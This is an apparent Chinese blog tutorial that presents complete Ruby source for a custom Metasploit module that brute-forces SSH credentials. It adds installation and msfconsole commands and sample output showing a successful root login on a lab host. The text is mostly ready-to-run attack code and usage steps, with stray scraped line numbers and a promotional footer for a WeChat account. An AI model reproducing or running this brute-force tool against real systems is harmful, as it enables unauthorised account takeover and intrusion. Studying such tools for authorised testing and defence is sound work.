# Metasploit自定义SSH认证暴力破解器
这里,我们首先编写一个脚本ssh_brute_by_binghe.rb,具体如下:
##
# Author 冰河
# Date 2019-01-12
# Description 自定义SSH暴力破解模块,用于暴力破解SSH
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/ssh'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
#提供必要的暴力破解机制和功能,例如提供了单独的登录用户名和密码表,生词表、空密码等选项
include Msf::Auxiliary::AuthBrute
#初始化基础信息
def initialize
super(
'Name' => 'SSH Scanner',
'Description' => %q{
SSH Brute Tool
},
'Author' => 'binghe',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(22)
],self.class)
end
def run_host(ip)
#cred_collection实现了按照数据存储选项来设置登录凭证
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD'],
user_file: datastore['USER_FILE'],
userpass_file: datastore['USERPASS_FILE'],
username: datastore['USERNAME'],
user_as_pass: datastore['USER_AS_PASS'],
)
scanner = Metasploit::Framework::LoginScanner::SSH.new(
host: ip,
port: datastore['PORT'],
cred_details: cred_collection,
proxies: datastore['Proxies'],
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: datastore['SSH_TIMEOUT'],
framework: framework,
framework_module: self,
)
#使用.scan实现扫描的初始化,它将完成所有的登录尝试
scanner.scan! do |result|
#to_h 将数据转换成哈希格式
credential_data = result.to_h
#将名字和工作区id合并到credential_data变量中
credential_data.merge!(
module_fullname: self.fullname,
workspace_id: myworkspace_id
)
#登录凭证正确,保存到数据库,并打印信息
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
print_good "#{ip} - LOGIN SUCCESSFUL: #{result.credential}"
#登录凭证不正确,将credential_data传入到invalidate_login方法,并打印信息
else
invalidate_login(credential_data)
print_status "#{ip} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"
end
end
end
end
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
接下来我们将ssh_brute_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/auxiliary/scanner/ssh目录下。
在运行这个脚本之前,我们先使用Metasploit中的msftidy工具检查一下此脚本的语法是否正确。
在Kali的命令行执行如下命令:
/usr/share/metasploit-framework/tools/dev/msftidy.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/ssh/ssh_brute_by_binghe.rb
1
未输出任何信息,证明脚本正确。
接下来,我们在msf终端运行ssh_brute_by_binghe.rb脚本
msfconsole
set RHOSTS 192.168.109.159
set USER_FILE /root/user
set PASS_FILE /root/pass
run
1
2
3
4
5
2
3
4
5
最终输出结果为:
[*] 192.168.109.159 - LOGIN FAILED: root:admin (Incorrect: )
[+] 192.168.109.159 - LOGIN SUCCESSFUL: root:admin123
[*] 192.168.109.159 - LOGIN FAILED: admin:123456 (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: admin:admin (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: admin:binghe (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:123456 (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:admin (Incorrect: )
[*] 192.168.109.159 - LOGIN FAILED: binghe:binghe (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
# 写在最后
如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!
